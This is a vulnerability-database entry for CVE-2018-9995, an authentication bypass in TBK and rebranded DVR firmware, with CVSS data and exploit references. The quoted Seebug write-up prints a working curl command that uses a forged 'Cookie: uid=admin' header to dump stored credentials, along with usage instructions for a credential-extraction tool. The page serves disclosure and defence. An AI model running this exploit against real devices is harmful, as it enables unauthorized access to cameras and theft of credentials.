Vulnerabilities > CVE-2018-9995 - Unspecified vulnerability in Tbkvision Tbk-Dvr4104 Firmware and Tbk-Dvr4216 Firmware

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
tbkvision
exploit available

Summary

TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.

Vulnerable Configurations

Part Description Count
OS
Tbkvision
2
Hardware
Tbkvision
2

Exploit-Db

descriptionTBK DVR4104 / DVR4216 - Credentials Leak. CVE-2018-9995. Remote exploit for Hardware platform
fileexploits/hardware/remote/44577.py
idEDB-ID:44577
last seen2018-05-24
modified2018-05-02
platformhardware
port
published2018-05-02
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/44577/
titleTBK DVR4104 / DVR4216 - Credentials Leak
typeremote

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/147478/tbk-disclose.txt
idPACKETSTORM:147478
last seen2018-05-07
published2018-05-04
reporterFernandez Ezequiel
sourcehttps://packetstormsecurity.com/files/147478/TBK-DVR4104-DVR4216-Credential-Disclosure.html
titleTBK DVR4104 / DVR4216 Credential Disclosure

Seebug

bulletinFamilyexploit
descriptionEn un articulo anterior presente una vuln que me permitía obtener las credenciales de cierto modelo de DVR. Tan simple como: ``` $> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" ``` Resulta que el hallazgo no corresponde a un vendor en particular como originalmente supuse. ![](https://images.seebug.org/1525243506216) Me encontraba boceteando una tool para facilitarme de manera amigable la extracción de esas credenciales y en el camino me tope con nuevos banners que en algunos casos representan a su vendor: ![](https://images.seebug.org/1525243525373) ![](https://images.seebug.org/1525243540342) ![](https://images.seebug.org/1525243552775) ![](https://images.seebug.org/1525243578280) ![](https://images.seebug.org/1525243592537) ![](https://images.seebug.org/1525243604986) ![](https://images.seebug.org/1525243623913) ![](https://images.seebug.org/1525243644066) ![](https://images.seebug.org/1525243650831) ![](https://images.seebug.org/1525243658139) etc... Finalmente una vez adentros son todos iguales (de vulnerables). ![](https://images.seebug.org/1525243700369) ![](https://images.seebug.org/1525243708239) ![](https://images.seebug.org/1525243726798) ![](https://images.seebug.org/1525243733897) On The Wild: ![](https://images.seebug.org/1525243758596) ![](https://images.seebug.org/1525243766181) ![](https://images.seebug.org/1525243773641) Claramente los equipos expuestos no son pocos ! TOOL: Ahora si: https://github.com/ezelf/CVE-2018-9995_dvr_credentials QUICK START ``` usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git usr@pwn:~$ cd CVE-2018-9995_dvr_credentials usr@pwn:~$ pip install -r requirements.txt ``` HELP ``` usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT] [+] Obtaining Exposed credentials optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit --host HOST Host --port PORT Port [+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81 ``` ![](https://images.seebug.org/1525243810405) ![](https://images.seebug.org/1525243819203)
idSSV:97260
last seen2018-06-26
modified2018-05-02
published2018-05-02
reporterMy Seebug
titleTBK DVR Login Bypass(CVE-2018-9995)